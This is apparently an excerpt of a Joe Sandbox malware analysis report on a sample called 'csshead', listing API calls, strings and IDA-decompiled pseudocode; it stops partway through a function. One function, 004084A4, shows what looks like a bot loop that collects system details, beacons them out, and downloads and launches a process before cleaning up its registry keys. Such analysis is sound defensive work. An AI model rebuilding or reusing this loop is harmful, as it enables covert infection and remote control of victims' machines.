Part of subcall function 00403D60: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 00403D99
Part of subcall function 00403D60: RegDeleteKeyA.ADVAPI32(00000000,?), ref: 00403DCC

Part of subcall function 00404D80: RegCloseKey.ADVAPI32(00000000,00000000,0040804B,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404D8A

Strings

\Implemented Categories, xrefs: 00406217
CLSID\, xrefs: 00406151, 004061F5
\Required Categories, xrefs: 00406173

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0042CE7D, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 196

APIs

GetStartupInfoW.KERNEL32(?), ref: 0042CE8A

Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C

GetFileType.KERNEL32(?), ref: 0042CFBD
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042CFF3
GetStdHandle.KERNEL32(-000000F6), ref: 0042D047
GetFileType.KERNEL32(00000000), ref: 0042D059
InitializeCriticalSectionAndSpinCount.KERNEL32(-00443954,00000FA0), ref: 0042D087
SetHandleCount.KERNEL32 ref: 0042D0B0

Strings

d9D, xrefs: 0042CF2D

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00418850, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 128window

APIs

SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004188C1
GetVersionExA.KERNEL32(?,00000000,00000030), ref: 0041890C
CheckMenuRadioItem.USER32(?,?,?,00000000,00000000), ref: 004189DC

Part of subcall function 00410D10: GetVersionExA.KERNEL32(?), ref: 00410D4A

GetMenuItemInfoA.USER32 ref: 0041898E
SetMenuItemInfoA.USER32(?,?,00000000,0000002C), ref: 004189BB

Strings

0, xrefs: 004188EC
,, xrefs: 0041892B
Z, xrefs: 00418924

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00413E50, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83window

APIs

SetTextColor.GDI32(?,?), ref: 00413E6B
SetBkMode.GDI32(?,?), ref: 00413E76
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00413E86
SelectObject.GDI32(?,00000000), ref: 00413E9C
SendMessageA.USER32 ref: 00413F0F
DrawTextA.USER32(?,000000C8,000000FF,?,?), ref: 00413F37
SelectObject.GDI32(?,?), ref: 00413F47

Strings

, xrefs: 00413EF7

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00413E50, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83
window

C-Code - Quality: 100%

			E00413E50(void* __ecx, intOrPtr _a4) {
				char _v215;
				char _v216;
				CHAR* _v220;
				CHAR* _v224;
				CHAR* _v228;
				CHAR* _v232;
				CHAR* _v236;
				CHAR* _v240;
				CHAR* _v244;
				void* _v248;
				void* _v252;
				void* _v260;
				int _t38;
				void* _t41;
				intOrPtr _t54;
				struct HDC__* _t56;
				void* _t57;

				_t54 = _a4;
				_t56 =  *(_t54 + 0x10);
				_t41 = __ecx;
				SetTextColor(_t56,  *(_t54 + 0x3c));
				SetBkMode(_t56,  *(_t54 + 0x64));
				_t57 = SendMessageA( *(__ecx + 4), 0x31, 0, 0);
				_v252 = 0;
				if(_t57 != 0) {
					_v260 = SelectObject(_t56, _t57);
				}
				_v216 = 0;
				E00422840( &_v215, 0, 0xc7);
				_v244 = 0;
				_v224 = 0;
				_v220 = 0;
				_v240 = 0;
				_v236 = 0;
				_v232 = 0;
				_v228 = 0;
				_v224 =  &_v216;
				_v248 = 0x20;
				_v244 = 2;
				_v220 = 0xc8;
				SendMessageA( *(_t41 + 4), 0x441,  *(_t54 + 0x24),  &_v248);
				_t38 = DrawTextA(_t56,  &_v216, 0xffffffff, _t54 + 0x14,  !(( *(_t41 + 0x85) & 0x000000ff) << 0x12) & 0x00100000 | 0x00000025);
				if(_t57 != 0) {
					return SelectObject(_t56, _v252);
				}
				return _t38;
			}

0x00413e5a
0x00413e64
0x00413e69
0x00413e6b
0x00413e76
0x00413e8c
0x00413e8e
0x00413e98
0x00413ea2
0x00413ea2
0x00413eb2
0x00413eb7
0x00413ec1
0x00413ec5
0x00413ec9
0x00413ed2
0x00413ed6
0x00413eda
0x00413ede
0x00413eea
0x00413ef7
0x00413eff
0x00413f07
0x00413f0f
0x00413f37
0x00413f3f
0x00000000
0x00413f47
0x00413f57

APIs

SetTextColor.GDI32(?,?), ref: 00413E6B
SetBkMode.GDI32(?,?), ref: 00413E76
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00413E86
SelectObject.GDI32(?,00000000), ref: 00413E9C
SendMessageA.USER32 ref: 00413F0F
DrawTextA.USER32(?,000000C8,000000FF,?,?), ref: 00413F37
SelectObject.GDI32(?,?), ref: 00413F47

Strings

, xrefs: 00413EF7

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0041FDD0, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 44
string

C-Code - Quality: 88%

			E0041FDD0(void* __ecx, CHAR* _a4) {
				char _v516;
				intOrPtr _t19;
				CHAR* _t22;
				void* _t32;

				_t32 = __ecx;
				lstrcpyA( &_v516,  *(__ecx + 0xc));
				_t22 = _a4;
				if(_t22 != 0) {
					lstrcatA( &_v516, " - ");
					lstrcatA( &_v516, _t22);
					_t19 =  *((intOrPtr*)(_t32 + 8));
					if(_t19 > 0) {
						_push(_t19);
						wsprintfA( &(( &_v516)[lstrlenA( &_v516) + 0x10]), ":%d");
					}
				}
				return SetWindowTextA( *(_t32 - 0x38),  &_v516);
			}

0x0041fdd8
0x0041fde3
0x0041fde9
0x0041fdf2
0x0041fe05
0x0041fe0d
0x0041fe0f
0x0041fe15
0x0041fe17
0x0041fe2d
0x0041fe33
0x0041fe15
0x0041fe4d

APIs

lstrcpyA.KERNEL32(?,?), ref: 0041FDE3
lstrcatA.KERNEL32(?, - ), ref: 0041FE05
lstrcatA.KERNEL32(?,?), ref: 0041FE0D
lstrlenA.KERNEL32(?,:%d,?), ref: 0041FE22
wsprintfA.USER32 ref: 0041FE2D
SetWindowTextA.USER32(?,?), ref: 0041FE3F

Strings

:%d, xrefs: 0041FE18
- , xrefs: 0041FDFB

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0041EBA0, Relevance: 13.8, APIs: 9, Instructions: 250

APIs

FindResourceA.KERNEL32(00442B94,?,000000F1), ref: 0041EBC5
LoadResource.KERNEL32(00442B94,00000000), ref: 0041EBDE
LockResource.KERNEL32(00000000), ref: 0041EBE9
CreateWindowExA.USER32(00000000,00436780,00000000,?,00000000,00000000,00000064,00000064,?,?,00442B90,00000000), ref: 0041ECD8
GetStockObject.GDI32(0000000D), ref: 0041ED26
GetObjectA.GDI32(?,0000003C,?), ref: 0041ED50
FindResourceA.KERNEL32(00442B94,?,00000002), ref: 0041ED77
LoadResource.KERNEL32(?,00000000), ref: 0041ED83
LockResource.KERNEL32(00000000), ref: 0041ED8A

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004210D0, Relevance: 13.7, APIs: 9, Instructions: 176string

APIs

InterlockedIncrement.KERNEL32(00000000), ref: 0042111C
lstrlen.KERNEL32 ref: 00421136
InterlockedDecrement.KERNEL32(?), ref: 004211A8
PathFindExtensionA.SHLWAPI(?), ref: 004211FB
lstrcmpi.KERNEL32(00000000,?), ref: 0042120F
InterlockedDecrement.KERNEL32(?), ref: 00421230
InterlockedDecrement.KERNEL32(?), ref: 0042128D
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004212BA
InterlockedDecrement.KERNEL32(?), ref: 004212D3

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004210D0, Relevance: 13.7, APIs: 9, Instructions: 176
string

C-Code - Quality: 75%

			E004210D0(intOrPtr* __ecx) {
				CHAR* _t41;
				long _t44;
				CHAR* _t47;
				CHAR* _t49;
				CHAR* _t57;
				CHAR* _t59;
				void* _t61;
				long _t64;
				void* _t68;
				signed int _t71;
				void* _t80;
				CHAR* _t81;
				char* _t84;
				int _t92;
				CHAR* _t94;
				LONG* _t95;
				LONG* _t96;
				intOrPtr* _t97;
				void* _t98;
				void* _t107;
				void* _t114;

				_t97 = __ecx;
				_t71 = 0;
				 *( *(_t98 + 8)) = 0;
				if( *((intOrPtr*)(__ecx + 0x18)) <= 0) {
					L19:
					_t81 =  *0x440024; // 0x44001c
					_push(4);
					 *(_t98 + 0x14) = _t81;
					_push(_t98 + 0x14);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x2c))))() == 0) {
						goto L35;
					} else {
						_t41 =  *(_t98 + 0x10);
						if( *((intOrPtr*)(_t41 - 8)) == 0) {
							goto L36;
						} else {
							_t47 = PathFindExtensionA( *(_t98 + 0x20));
							if(_t47 == 0 || lstrcmpiA(_t47,  *(_t98 + 0x10)) != 0) {
								goto L35;
							} else {
								_t49 =  *(_t98 + 0x10);
								_t114 = _t49 - 0xc -  *0x440020; // 0x440010
								if(_t114 != 0 && InterlockedDecrement( &(_t49[0xfffffffffffffff4])) <= 0) {
									_push( &(( *(_t98 + 0x10))[0xfffffffffffffff4]));
									L004221B4();
								}
								return 4;
							}
						}
					}
				} else {
					while(_t71 >= 0 && _t71 <  *((intOrPtr*)(_t97 + 0x18))) {
						 *((intOrPtr*)(_t98 + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t97 + 0x14)) + _t71 * 4));
						_t94 =  *(E00402430( *((intOrPtr*)( *((intOrPtr*)(_t97 + 0x14)) + _t71 * 4))));
						if( *(_t94 - 0xc) < 0) {
							_t57 =  *0x440024; // 0x44001c
							 *(_t98 + 0x14) = _t57;
							__eflags = _t94;
							if(_t94 != 0) {
								_t92 = lstrlenA(_t94);
							} else {
								_t92 = 0;
							}
							_t59 = E00401BA0(_t98 + 0x18, _t92);
							__eflags = _t59;
							if(_t59 == 0) {
								_t94 =  *(_t98 + 0x14);
								goto L14;
							} else {
								_t94 =  *(_t98 + 0x1c);
								_t13 = _t92 + 1; // 0x1
								_t80 = _t13;
								_t68 = L00422399(_t94, _t80, _t94, _t92);
								_t98 = _t98 + 0x10;
								__eflags = _t68 - 0x50;
								if(_t68 > 0x50) {
									L29:
									L00401230(0x80004005);
									goto L30;
								} else {
									_t14 = _t68 + 0x42130c; // 0x3030300
									switch( *((intOrPtr*)(( *_t14 & 0x000000ff) * 4 +  &M004212FC))) {
										case 0:
											 *((intOrPtr*)(_t94 - 8)) = _t92;
											 *((char*)(_t92 + _t94)) = 0;
											goto L14;
										case 1:
											L00401230(0x8007000e);
											goto L28;
										case 2:
											L28:
											L00401230(0x80070057);
											goto L29;
										case 3:
											goto L29;
									}
								}
							}
						} else {
							InterlockedIncrement(_t94 - 0xc);
							L14:
							_t61 = L00424BC1(_t94,  *(_t98 + 0x20));
							_t98 = _t98 + 8;
							_t80 = _t94 - 0xc;
							if(_t61 == 0) {
								L30:
								 *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x24)))) =  *((intOrPtr*)(_t98 + 0x18));
								__eflags = _t80 -  *0x440020; // 0x440010
								if(__eflags != 0) {
									_t95 =  &(_t94[0xfffffffffffffff4]);
									_t64 = InterlockedDecrement(_t95);
									__eflags = _t64;
									if(_t64 <= 0) {
										_push(_t95);
										L004221B4();
									}
								}
								return 5;
							} else {
								_t107 = _t80 -  *0x440020; // 0x440010
								if(_t107 != 0) {
									_t96 =  &(_t94[0xfffffffffffffff4]);
									if(InterlockedDecrement(_t96) <= 0) {
										_push(_t96);
										L004221B4();
										_t98 = _t98 + 4;
									}
								}
								_t71 = _t71 + 1;
								if(_t71 <  *((intOrPtr*)(_t97 + 0x18))) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L40;
					}
					RaiseException(0xc000008c, 1, 0, 0);
					L35:
					_t41 =  *(_t98 + 0x10);
					L36:
					__eflags = _t41 - 0xc -  *0x440020; // 0x440010
					if(__eflags != 0) {
						_t44 = InterlockedDecrement( &(_t41[0xfffffffffffffff4]));
						__eflags = _t44;
						if(_t44 <= 0) {
							_t84 =  &(( *(_t98 + 0x10))[0xfffffffffffffff4]);
							__eflags = _t84;
							_push(_t84);
							L004221B4();
						}
					}
					return 3;
				}
				L40:
			}

0x004210d9
0x004210db
0x004210de
0x004210e8
0x004211c5
0x004211c5
0x004211ce
0x004211d4
0x004211db
0x004211e2
0x00000000
0x004211e8
0x004211e8
0x004211f0
0x00000000
0x004211f6
0x004211fb
0x00421203
0x00000000
0x0042121d
0x0042121d
0x00421224
0x0042122a
0x00421241
0x00421242
0x00421247
0x00421256
0x00421256
0x00421203
0x004211f0
0x004210f0
0x004210f0
0x00421107
0x00421110
0x00421116
0x00421124
0x00421129
0x0042112d
0x0042112f
0x0042113c
0x00421131
0x00421131
0x00421131
0x00421143
0x00421148
0x0042114a
0x0042117f
0x00000000
0x0042114c
0x0042114e
0x00421152
0x00421152
0x00421157
0x0042115c
0x0042115f
0x00421162
0x0042126d
0x00421272
0x00000000
0x00421168
0x00421168
0x0042116f
0x00000000
0x00421176
0x00421179
0x00000000
0x00000000
0x0042125e
0x00000000
0x00000000
0x00421263
0x00421268
0x00000000
0x00000000
0x00000000
0x00000000
0x0042116f
0x00421162
0x00421118
0x0042111c
0x00421183
0x00421189
0x0042118e
0x00421191
0x00421196
0x00421277
0x0042127f
0x00421281
0x00421287
0x00421289
0x0042128d
0x00421293
0x00421295
0x00421297
0x00421298
0x0042129d
0x00421295
0x004212ac
0x0042119c
0x0042119c
0x004211a2
0x004211a4
0x004211b0
0x004211b2
0x004211b3
0x004211b8
0x004211b8
0x004211b0
0x004211bb
0x004211bf
0x00000000
0x00000000
0x00000000
0x00000000
0x004211bf
0x00421196
0x00000000
0x00421116
0x004212ba
0x004212c0
0x004212c0
0x004212c4
0x004212c7
0x004212cd
0x004212d3
0x004212d9
0x004212db
0x004212e1
0x004212e1
0x004212e4
0x004212e5
0x004212ea
0x004212db
0x004212f9
0x004212f9
0x00000000

APIs

InterlockedIncrement.KERNEL32(00000000), ref: 0042111C
lstrlenA.KERNEL32 ref: 00421136

Part of subcall function 00401BA0: InterlockedDecrement.KERNEL32(?), ref: 00401BC8

InterlockedDecrement.KERNEL32(?), ref: 004211A8
PathFindExtensionA.SHLWAPI(?), ref: 004211FB
lstrcmpiA.KERNEL32(00000000,?), ref: 0042120F
InterlockedDecrement.KERNEL32(?), ref: 00421230

Part of subcall function 00401230: RaiseException.KERNEL32(-C006C020,00000001,00000000,00000000,0040807F,80004005), ref: 0040124C

InterlockedDecrement.KERNEL32(?), ref: 0042128D
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004212BA
InterlockedDecrement.KERNEL32(?), ref: 004212D3

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 004084A4, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 335
sleepthread

C-Code - Quality: 98%

			E004084A4() {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				long _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v156;
				char _v4253;
				char _v4382;
				char _v4424;
				char _v4428;
				intOrPtr _t119;
				intOrPtr _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr _t144;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t157;
				intOrPtr _t165;
				intOrPtr _t170;
				intOrPtr _t174;
				intOrPtr _t179;
				intOrPtr _t187;
				void* _t195;
				intOrPtr _t198;
				signed int _t199;
				char _t202;
				intOrPtr _t205;
				signed int _t208;
				intOrPtr _t220;
				intOrPtr _t228;
				char _t236;
				intOrPtr _t269;
				char _t276;
				intOrPtr _t279;
				intOrPtr _t283;
				intOrPtr _t289;
				intOrPtr* _t290;
				intOrPtr _t291;
				intOrPtr _t292;
				void* _t300;
				void* _t301;
				void* _t317;

				_v68 = _t119;
				_v40 = E004013DC(0x20000);
				_v60 = 0;
				_v64 = 0;
				_v4382 = 0;
				if( *0x40b77c == 0) {
					_t276 =  *0x40c355; // 0x0
					_v4428 = _t276;
					E00401308( &_v4424, 0x40c384);
					while(1) {
						_t281 =  &_v4428;
						_t279 =  *0x40a194; // 0x401e9c
						_v12 = E00405AE8(_t279,  &_v4428, 0);
						if(_v12 != 0) {
							goto L4;
						}
						Sleep(0x4e20);
					}
					while(1) {
						L4:
						_v48 = 0;
						E004064BC( &_v156, 0x32, __eflags);
						_t283 =  *0x40a198; // 0x401eac
						E00401308(_v40, _t283);
						E0040133C(_v40, "1530474054");
						_t131 =  *0x40a19c; // 0x401eb4
						E0040133C(_v40, _t131);
						_t135 =  *0x40b77c; // 0x0
						E00401864(_t135,  &_v4253);
						E0040133C(_v40,  &_v4253);
						_t140 =  *0x40a0bc; // 0x401c84
						E0040133C(_v40, _t140);
						_t144 =  *0x40c380; // 0x0
						E00401864(_t144,  &_v4253);
						E0040133C(_v40,  &_v4253);
						_t149 =  *0x40a0c0; // 0x401c8c
						E0040133C(_v40, _t149);
						_t152 =  *0x40c37c; // 0x0
						E00401164(_t152,  &_v4253);
						E0040133C(_v40,  &_v4253);
						_t157 =  *0x40a0b4; // 0x401c70
						E0040133C(_v40, _t157);
						E00408258( &_v4253);
						E0040133C(_v40,  &_v4253);
						_t165 =  *0x40a0b8; // 0x401c78
						E0040133C(_v40, _t165);
						E0040133C(_v40, 0x408984);
						_t170 =  *0x40a0c4; // 0x401c94
						E0040133C(_v40, _t170);
						_t174 =  *0x40c355; // 0x0
						E00401864(_t174,  &_v4253);
						E0040133C(_v40,  &_v4253);
						_t317 = _t301 + 0x80;
						__eflags = _v4382;
						if(_v4382 != 0) {
							E0040133C(_v40,  &_v4382);
							_t317 = _t317 + 8;
						}
						_t179 =  *0x40a1bc; // 0x401ef8
						E0040133C(_v40, _t179);
						E00404154( &_v4253);
						E0040133C(_v40,  &_v4253);
						_t187 =  *0x40a0c8; // 0x401c9c
						E0040133C(_v40, _t187);
						_t301 = _t317 + 0x18;
						_v8 = 0;
						_v44 = GetTickCount();
						__eflags = _v44 - 0x3a98;
						if(_v44 < 0x3a98) {
							__eflags = 0x3a98;
							Sleep(0x3a98 - _v44);
						}
						_t195 = E004012DC(_v40);
						_t198 =  *0x40c230; // 0x0
						_t199 =  *0x40b784; // 0x0
						_v12 = E00405D20(_t281, _t199 &  *0x40a074, _t198,  &_v156, 0x40b625, 0x40c355, _v40, _t195,  &_v16,  &_v20);
						__eflags = _v12;
						if(_v12 == 0) {
							break;
						}
						_t289 =  *0x40a240; // 0x4020a8
						_v36 = E00401110(_v16, _t289);
						_v24 = _v16;
						_t220 =  *0x40c355; // 0x0
						 *0x40b64d = _t220;
						 *0x40b780 = E00405468();
						E00407474(0x40b61c, __eflags);
						_t290 =  *0x40a1a8; // 0x401ecc
						__eflags =  *_v24 -  *_t290;
						if( *_v24 ==  *_t290) {
							L21:
							E00401440(_v16);
							do {
								_v48 = _v48 + 1;
								Sleep(0x3e8);
								_v52 = _v52 + 1;
								_t228 =  *0x40b715; // 0x0
								__eflags = _t228 - _v48;
							} while (__eflags > 0);
							continue;
						}
						_v56 = 0;
						_v28 = 0;
						_t291 =  *0x40a190; // 0x401e8c
						_v28 = E00401110(_v24, _t291);
						__eflags = _v28;
						if(_v28 == 0) {
							_t292 =  *0x40a18c; // 0x401e7c
							_v28 = E00401110(_v24, _t292);
						} else {
							_v56 = 0xffffffff;
						}
						__eflags = _v28;
						if(_v28 != 0) {
							_v44 = _v28 - _v24;
							_v28 = _v28 + 0xd;
							_v36 = E00401110(_v28, E00408988);
							_v32 = _v36 - _v28;
							_t281 = _v32;
							E004012B8( &_v4253, _v32, _v28);
							 *((char*)(_t300 + _v32 - 0x1099)) = 0;
							_v32 = E004010E0( &_v4253, _v28);
							_t269 = _v36 + 2;
							__eflags = _t269;
							_v28 = _t269;
							 *((char*)(_v24 + _v44)) = 0;
						}
						__eflags = _v56;
						if(__eflags == 0) {
							L19:
							_t236 = E00407F20(_v24, _t281, 4);
							__eflags = _t236;
							if(_t236 != 0) {
								E004080C0(_v56);
								E00401440(_v40);
								E00401440(_v16);
								_push(0);
								RtlExitUserThread();
							}
							goto L21;
						} else {
							_t281 = _v32;
							__eflags = E004082F8(_v24, _v32, _v28, __eflags);
							if(__eflags == 0) {
								E00401440(_v16);
								continue;
							}
							E004080C0(_v56);
							E00401440(_v40);
							E00401440(_v16);
							_push(0);
							RtlExitUserThread();
							goto L19;
						}
					}
					_t202 =  *0x40c355; // 0x0
					_v4428 = _t202;
					E00401308( &_v4424, 0x40c384);
					_t205 =  *0x40b651; // 0x0
					_t208 =  *0x40b784; // 0x0
					_t281 =  *0x40b780; // 0x0
					__eflags = E0040660C(_t208 &  *0x40a074, _t281, 0x40b625, __eflags, 0x40ba00,  &_v4428,  &_v4253, _t205);
					if(__eflags != 0) {
						E00401308(0x40b625,  &_v4253);
						E00401308(0x40c254,  &_v4253);
					}
					 *0x40c355 = _v4428;
					 *0x40b64d = _v4428;
				}
			}

0x004084b4
0x004084c1
0x004084c6
0x004084cb
0x004084ce
0x004084dc
0x004084de
0x004084e3
0x004084f4
0x004084f9
0x004084f9
0x00408501
0x0040850b
0x00408512
0x00000000
0x00000000
0x00408519
0x00408519
0x00408521
0x00408521
0x00408523
0x0040852e
0x00408533
0x0040853c
0x0040854a
0x00408552
0x0040855c
0x0040856b
0x00408571
0x00408584
0x0040858c
0x00408596
0x004085a5
0x004085ab
0x004085be
0x004085c6
0x004085d0
0x004085de
0x004085e3
0x004085f3
0x004085fb
0x00408605
0x00408613
0x00408623
0x0040862b
0x00408635
0x00408646
0x0040864e
0x00408658
0x00408667
0x0040866d
0x00408680
0x00408685
0x00408688
0x0040868f
0x0040869c
0x004086a1
0x004086a1
0x004086a4
0x004086ae
0x004086bc
0x004086cc
0x004086d4
0x004086de
0x004086e3
0x004086e8
0x004086f1
0x004086f4
0x004086fb
0x00408702
0x00408706
0x00408706
0x00408717
0x00408732
0x00408738
0x00408749
0x0040874c
0x00408750
0x00000000
0x00000000
0x00408756
0x00408764
0x0040876a
0x0040876d
0x00408772
0x0040877c
0x00408786
0x00408790
0x00408796
0x00408798
0x004088bc
0x004088bf
0x00408957
0x00408957
0x0040895f
0x00408965
0x00408968
0x0040896d
0x0040896d
0x00000000
0x00408972
0x004087a0
0x004087a5
0x004087a8
0x004087b6
0x004087b9
0x004087bd
0x004087c8
0x004087d6
0x004087bf
0x004087bf
0x004087bf
0x004087d9
0x004087dd
0x004087e5
0x004087ee
0x004087fe
0x00408807
0x00408810
0x00408816
0x0040881e
0x00408831
0x00408837
0x00408837
0x0040883a
0x00408843
0x00408843
0x00408847
0x0040884b
0x0040888e
0x00408893
0x00408898
0x0040889a
0x0040889f
0x004088a7
0x004088af
0x004088b4
0x004088b6
0x004088b6
0x00000000
0x0040884d
0x0040884d
0x0040885b
0x0040885d
0x00408884
0x00000000
0x00408884
0x00408862
0x0040886a
0x00408872
0x00408877
0x00408879
0x00000000
0x00408879
0x0040884b
0x004088c9
0x004088ce
0x004088df
0x004088e4
0x00408902
0x0040890d
0x00408918
0x0040891a
0x00408927
0x00408937
0x00408937
0x00408942
0x0040894d
0x0040894d

APIs

Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2

Sleep.KERNEL32(00004E20), ref: 00408519

Part of subcall function 004064BC: GetVersionExA.KERNEL32(0000009C), ref: 00406530

Part of subcall function 00401864: wsprintfA.USER32 ref: 00401874

Part of subcall function 00404154: GetKeyboardLayoutList.USER32(00000009,?), ref: 00404169

GetTickCount.KERNEL32 ref: 004086EB
Sleep.KERNEL32(00003A98), ref: 00408706

Part of subcall function 00405468: GetSystemTime.KERNEL32(?), ref: 00405472

Part of subcall function 00407474: RegCreateKeyExA.ADVAPI32(80000002,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0040750D
Part of subcall function 00407474: RegCreateKeyExA.ADVAPI32(80000001,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00407533

RtlExitUserThread.NTDLL(00000000), ref: 004088B6

Part of subcall function 004082F8: GetTempPathA.KERNEL32(00000201,?), ref: 00408364
Part of subcall function 004082F8: Sleep.KERNEL32(000005DC), ref: 004083E3
Part of subcall function 004082F8: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040840C
Part of subcall function 004082F8: wsprintfA.USER32 ref: 00408476

RtlExitUserThread.NTDLL(00000000), ref: 00408879

Part of subcall function 004080C0: RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 004080DB
Part of subcall function 004080C0: CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 004080E9
Part of subcall function 004080C0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00408106
Part of subcall function 004080C0: CloseHandle.KERNEL32(00000000), ref: 00408112
Part of subcall function 004080C0: SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 00408184
Part of subcall function 004080C0: SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 004081BB
Part of subcall function 004080C0: SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 004081FB
Part of subcall function 004080C0: ReleaseMutex.KERNEL32(00000000), ref: 00408221
Part of subcall function 004080C0: CloseHandle.KERNEL32(00000000), ref: 0040822D
Part of subcall function 004080C0: ExitProcess.KERNEL32 ref: 00408244

Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454

Part of subcall function 0040660C: Sleep.KERNEL32(000927C0), ref: 004066F5
Part of subcall function 0040660C: GetTickCount.KERNEL32 ref: 004066FD
Part of subcall function 0040660C: GetTickCount.KERNEL32 ref: 004067AF
Part of subcall function 0040660C: Sleep.KERNEL32(00001388), ref: 004067CD
Part of subcall function 0040660C: Sleep.KERNEL32(000493E0), ref: 004067F3
Part of subcall function 0040660C: Sleep.KERNEL32(000927C0), ref: 0040680F

Sleep.KERNEL32(000003E8), ref: 0040895F

Strings

1530474054, xrefs: 00408541

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 0040660C, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 214
sleep

C-Code - Quality: 95%

			E0040660C(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
